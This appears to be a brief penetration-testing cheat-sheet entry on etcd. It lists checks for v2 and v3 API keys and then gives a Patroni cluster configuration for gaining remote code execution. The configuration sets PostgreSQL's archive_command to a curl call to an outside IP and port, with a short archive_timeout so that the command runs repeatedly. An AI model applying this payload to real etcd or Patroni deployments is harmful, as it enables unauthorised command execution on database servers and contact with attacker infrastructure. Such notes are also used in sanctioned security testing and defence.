Etcd
Check v2 api keys
Check v3 api keys
Update Patroni cluster config for RCE
{
"ttl": 30,
"loop_wait": 10,
"retry_timeout": 10,
"maximum_lag_on_failover": 1048576,
"postgresql": {
"use_pg_rewind": true,
"parameters": {
"archive_command": "curl http://158.160.117.132:1337", // command for RCE
"archive_mode": "always",
"archive_timeout": "10", // period for command execution
"max_connections": 550,
"max_locks_per_transaction": 512,
"max_worker_processes": 27
}
}
}Last updated